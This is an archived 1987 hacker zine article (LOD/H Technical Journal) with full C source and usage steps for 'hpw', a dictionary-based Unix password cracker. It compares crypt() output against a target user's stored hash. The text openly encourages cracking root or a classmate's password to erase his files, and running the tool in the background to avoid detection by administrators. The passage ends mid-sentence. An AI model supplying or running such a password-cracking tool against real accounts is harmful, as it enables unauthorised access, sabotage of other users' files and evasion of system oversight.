home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / lodhtj02.006 < prev    next >
Encoding:
Text File  |  2003-06-11  |  4.9 KB  |  159 lines
  1.  
  2. The LOD/H Technical Journal: File #6 of 10
  3.  
  4.  
  5. A Discreet Unix Password Hacker
  6. -------------------------------
  7.  
  8. By Shooting Shark / Tiburon Systems  4 Mar 87
  9.  
  10.      Imagine this familiar situation:  you have an account on a Unix system.
  11. Perhaps it's your account on your school's VAX, or an account you've hacked
  12. yourself.  You'd like to collect more passwords to this system - perhaps
  13. to the 'root' or 'bin' accounts so you can take control of the system, or the
  14. password of the class hotshot who's going to get an 'A' on his compiler
  15. project and upset the curve unless you go in and erase all of his files.
  16. The problem is getting these passwords.  The most obvious method would be to
  17. manually enter login/password combinations until you found one.  This is
  18. slow (>10 seconds per try), will give you sore fingers, and multiple
  19. invocations of the 'login' program may be noticed.  You could write a program
  20. on your micro to dial up the site (*if* it has a dialup) and try passwords
  21. from a login/password pool, but this is just as slow, ties up your computer
  22. and your phone line, and again is subject to easy detection.  The solution
  23. to this problem is to have the system itself hack passwords for you.
  24. It can do this unattended and at a considerable speed while you go about
  25. your life, and will be difficult to detect by system demigods.
  26.  
  27. Here is the C source for my program.  Upload it to your Unix site and
  28. compile it.
  29.  
  30. --- cut here ---
  31. /*
  32.  * hpw.c v1.4: 8 October '86
  33.  * Written by Shooting Shark / Tiburon Systems
  34.  *
  35.  */
  36.  
  37. #include <sys/file.h>
  38. #include <stdio.h>
  39. #include <pwd.h>
  40. #include <signal.h>
  41.  
  42. struct     passwd *pwd, *getpwname(name);
  43.  
  44. int   len, abort(), endpwent();
  45.  
  46. char  crbuf[30], *strcpy(), *crypt(), *getpass(), *getlogin(), *pw, pwbuf[10];
  47.  
  48. main(argc, argv)
  49. int argc;
  50. char *argv[];
  51. {
  52.  
  53. FILE *fopen(), *fp;
  54.  
  55. char *uname;
  56. signal(SIGINT,abort);
  57.  
  58.  
  59. if (argc !=3) {
  60.      printf("usage : %s username pwfile\n",argv[0]);
  61.      exit(-1);
  62.      }
  63.  
  64.  
  65.  
  66.  
  67.  
  68. if (!(pwd =getpwnam(argv[1]))) {
  69.      printf("unknown user : %s\n",argv[1]);
  70.      exit(-1);
  71.      }
  72.  
  73. if ((fp = fopen(argv[2], "r")) == NULL) {
  74.      perror(argv[2]);
  75.      exit(-1);
  76.      }
  77.  
  78.  
  79.  
  80. sprintf(crbuf,"%s",pwd->pw_passwd);
  81.  
  82. printf("hacking %s\n",argv[1]);
  83. printf("encrypted password : %s\n",crbuf);
  84.  
  85. while (fgets(pwbuf, 20, fp) != NULL) {
  86.      pwbuf[strlen(pwbuf)-1] = '\0';
  87.      pw = crypt(pwbuf,crbuf);
  88.      if (!strcmp(pw,crbuf)) {
  89.      printf("%s ==> %s\n",argv[1],pwbuf);
  90.      exit(0);
  91.      }
  92.      }
  93. printf("done -- password not found.\n");
  94.  
  95.  
  96.      endpwent();
  97.  
  98.  
  99. }
  100.  
  101. abort()
  102. {
  103. printf("aborted while trying '%s'\n",pwbuf);
  104.  
  105. exit(-1);
  106. }
  107.  
  108. --- cut here ---
  109.  
  110. (Note - written on a Pyramid 90x running Berzerkeley Unix 4.2.  If you're
  111. running SysV or something else you may have problems.  You probably
  112. won't, but you might.)
  113.  
  114. Now that you have the above compiled into a file called 'hpw,' invoke
  115. it with
  116.  
  117. % hpw username pwfile
  118. ( % is the shell prompt; don't type it...)
  119.  
  120. where username is the login name of the user who's password you'd like
  121. to hack, and pwfile is the path of a text file that contains the pool of
  122. likely passwords.  Most sites will have a file of words for the 'spell'
  123. spelling checker - it will probably be /usr/dict/words and contain at least
  124. 15,000 potential passwords.
  125.  
  126. Hpw starts by loading the user's encrypted password from /etc/password and
  127. stores it in crbuf.  It then starts reading words from the file you've
  128. specified, encrypts them using the crypt() routine, and compares them to
  129. the encrypted password.  If they match, the program outputs a line like:
  130. 'shark ==> hispassword' and quits.  If they don't match, it goes on to the
  131. next potential password.  If the program goes through the entire list and
  132. doesn't find the correct password, it prints 'done -- password not found'
  133. and quits.  If you hit ^C (or BREAK, or whatever your interrupt character
  134. is) the program tells you which word in the file it had gotten to when
  135. it was interrupted and quits.  Then, the next time you attempt to hack that
  136. login name, you can start where you left off during the previous session.
  137.  
  138. The beauty of this program is that you can run it in background with the
  139. output sent to a file and then log off, or play rogue, or whatever.  To
  140. hack melody's password using /usr/dict/words as your pool file, and to
  141. have all messages generated by the program sent to a file called 'out.file'
  142. and run the program in background, you'd enter from csh:
  143.  
  144. % hpw melody /usr/dict/words > out.file &
  145.  
  146. the & signifies a background process.  The system will print something like:
  147. [1] 90125
  148. this means it's job number 1 for you, and has process id 90125.  To bring
  149. the program back into the foreground, enter:
  150.  
  151. % %1
  152.  
  153. and to kill the process, type
  154.  
  155. % kill 90125
  156.  
  157. if you have hpw running in background and you're in csh, you can just log off
  158. and the program will continue to silently gather passwords.  If you're u
  159.